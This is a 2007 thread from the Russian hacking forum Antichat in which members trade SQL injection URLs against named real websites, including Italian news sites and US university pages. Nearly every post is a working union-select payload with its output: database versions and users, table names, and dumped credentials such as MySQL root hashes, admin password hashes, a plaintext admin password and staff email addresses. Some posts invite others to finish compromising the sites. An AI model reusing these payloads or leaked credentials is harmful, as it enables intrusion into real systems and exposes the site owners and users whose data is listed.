ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3871  
Старый 27.11.2007, 20:47
Mike 007
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215

Репутация: 86
Smile

Код:
http://www.galamax.it/Abito.it.php?Id=-1+union+select+1,user(),3,4,database(),6,7,8,version(),10/*
Код:
http://microplasma.ru/?page_id=-1+union+select+1,2,3,4,5/*
Код:
http://ocenshik.mostpp.ru/static.php?id=-1+order+by+8/*
Код:
http://www.sobesednik.ru/news.php?id=1&art_id=-1'
Код:
http://www.rudtp.ru/lib.php?id=-1+order+by+12/*
Код:
http://www.iek.ru/product/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*&category=88&product=36

Последний раз редактировалось Mike 007; 27.11.2007 в 23:02..
 
Ответить с цитированием

  #3872  
Старый 28.11.2007, 01:54
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

www.multilingual.com
Код:
http://www.multilingual.com/mlNewsArchiveDetail.php?id=-1+union+select+1,2,3,version()+--+
5.0.27-standard
Код:
http://www.multilingual.com/mlNewsArchiveDetail.php?id=-1+union+select+1,2,3,concat(table_schema,0x3a,table_name)+from+information_schema.columns+where+column_name=0x70617373776F7264+--+
blogos:exp_members

username
password
email
Код:
http://www.multilingual.com/mlNewsArchiveDetail.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,password,email)+from+blogos.exp_members+limit+0,1+--+
Код:
eeadmin:f59e5685b68217f1867988be7c15db56e8bb94ba:donna@multilingual.com 
 donna:cde612de4aed40a0b25ccf16d32d55c23e2be737:books@multilingual.com
 
Ответить с цитированием

edu
  #3873  
Старый 28.11.2007, 02:20
Underwit
Banned
Регистрация: 06.10.2006
Сообщений: 288
Провел на форуме:
2741921

Репутация: 469
По умолчанию edu

Цитата:
http://www.hvcc.edu/news_events/newsstory.php?id=-1+union+select+1,concat(username,0x3a,password),3, 4,5,6,7,8,9,10,11,12,13,14+from+mysql.user/*
root:*928AC7647884E687088EEAB171F96719E4C78BBD
admin:522737936936e128 - nimda
landp:*B0FA4CE370C35CCBDE20BD7D7E1CCD1135FBCFE1
 
Ответить с цитированием

  #3874  
Старый 28.11.2007, 13:46
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

Италия

sulpalco.com
Код:
http://www.sulpalco.com/articoli/articolo.php?id=-1+union+select+1,2,3,4,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71)),6,7,8,9,10,11/*
4.1.18-nt:sp_vers1:sulpalco@localhost

bandieragialla.it[CODE]
Код:
http://www.bandieragialla.it/articolo.php?id=-1+union+select+1,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
4.1.12-standard:www2:www2db@localhost

storialibera.it[CODE]
Код:
http://www.storialibera.it/il_sabato/articolo.php?id=-1+union+select+1,2,3,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71)),5,6,7,8,9,10,11,12,13/*
4.1.13-standard:storialibera:sl_user@localhost

Нашёл только табу articoli

thelancet.it
Код:
http://www.thelancet.it/archivio/articolo.php?id=13&idart=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user())/*
4.0.24-log:Sql321et:the76et13@demone.consultingweb.it

igiochideigrandi.it
Код:
http://www.igiochideigrandi.it/articolo.php?ID=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11/*
5.0.24a-standard:igdg:igdg@fiona

Из интересных таблиц только - clienti и email

evolutionschool.com
Код:
http://www.evolutionschool.com/old/libera_scuola/index.php?sup=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13/*
4.0.18-standard:evolutionsc29158:evolutionsc29158@web-a1.seeweb

Админ:
Код:
http://www.evolutionschool.com/old/libera_scuola/index.php?sup=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user_name,password),12,13+from+auth+limit+0,1/*
[логин : пасс] :
Код:
admin : 99alanma99
Админку не нашёл, кто найдёт - отпишитесь [+].

danielesegre.it
Код:
http://www.danielesegre.it/articolo.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9/*
5.0.45-community-log:Sql121959_1:Sql121959@62.149.140.82

Админ:
Код:
http://www.danielesegre.it/articolo.php?id=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+utenti+limit+0,1/*
[логин : МД5(пасс)] :
Код:
daniele : f156e7995d521f30e6c59a3d6c75e1e5
 
Ответить с цитированием

  #3875  
Старый 28.11.2007, 14:48
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

lapa.princeton.edu

Код:
http://lapa.princeton.edu/peopledetail.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a,version(),user(),database()),19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+mysql.user+--+
4.1.12:lapa@localhost:LAPA
Код:
http://lapa.princeton.edu/peopledetail.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a,user,password),19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+mysql.user+--+
Код:
root:*74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3
 
Ответить с цитированием

  #3876  
Старый 28.11.2007, 15:42
Mike 007
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215

Репутация: 86
Talking

Код:
http://www.buliro.it/forumgiovani/articolo.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
Код:
http://www.floornature.com/articoli/articolo.php?id=-1'&sez=6&lang=en
Код:
http://www.kousmine.it/articolo.php?id=-1+union+select+1,2,user(),4,version(),6,7,8,9,10,11/*
kousmine@localhost
4.1.20
Код:
http://www.storialibera.it/il_sabato/articolo.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
тут ничего не вышло.
Код:
http://www.polonews.info/articolo.php?id=-1+union+select+1,2,user(),database(),version(),6/*
LB5706_polonews@81.88.49.16
Код:
http://www.ocsabaoth.com/articolo.php?id=-1+union+select+user(),2,3,database(),version(),6,7,8,9/*
minister@win3.infinology.com
4.1.22-standard-log

Кто дораскрутит?
Код:
http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,table_name,4,5+from+information_schema.tables/*
тут список всех таблиц.
Код:
http://www.mpa-lazio.it/articolo.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+infor  mation_schema.COLUMNS/*

Последний раз редактировалось Mike 007; 28.11.2007 в 21:00..
 
Ответить с цитированием

  #3877  
Старый 28.11.2007, 15:58
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

Италия

didaweb.net
Код:
http://www.didaweb.net/liste/leggi.php?a=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12/*&lista=001
4.0.27-standard-log:Sql40985_1:Sql40985@62.149.140.21

comunemio.it
Код:
http://www.comunemio.it/sezione.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3/*
4.0.18-nt:dg2:edicolante@localhost

ildiavolo.com
Код:
http://www.ildiavolo.com/articolo.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12/*&mode=articolo
5.0.32-Dotdeb_1.dotdeb.1-log:ildiavolosql1:ildiavolosql1@localhost

Интересных таблиц не нашёл.
 
Ответить с цитированием

  #3878  
Старый 28.11.2007, 17:40
TheSoul
Познающий
Регистрация: 12.11.2007
Сообщений: 94
Провел на форуме:
4789789

Репутация: 71
По умолчанию

http://anekdot.meta.ua
Код:
http://anekdot.meta.ua/index.php?theme=-53+union+select+1/*
anekdot@192.168.11.27
4.0.26-max-log
anekdot

http://www.uazmadi.ru
Код:
http://www.uazmadi.ru/news.php?news_id=-1+union+select+1,2,3,table_name,5,6,7,8,9,10,11+from+information_schema.tables+limit+2,1/*
 
Ответить с цитированием

  #3879  
Старый 28.11.2007, 20:27
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию

edu
Код:
http://duckhenge.uoregon.edu/io/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
io@localhost:5.0.32-Debian_7etch1-log:io
 
Ответить с цитированием

  #3880  
Старый 28.11.2007, 21:18
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

wandp.american.edu
Код:
http://wandp.american.edu/pages.php?ID=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4+--+
4.1.13a-nt
Код:
http://wandp.american.edu/pages.php?ID=-1+union+select+1,2,3,4+from+mysql.user+--+
user
password

root:*ADDF07FCC8E37371B887F38314C77A2FA4BC71CE
kirill:*647EE0BF48ED4F9607F02931A1F64099C4883091
pmauser:*D9826E8D7609B8DF2B01003A4149F81513FEBF22
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ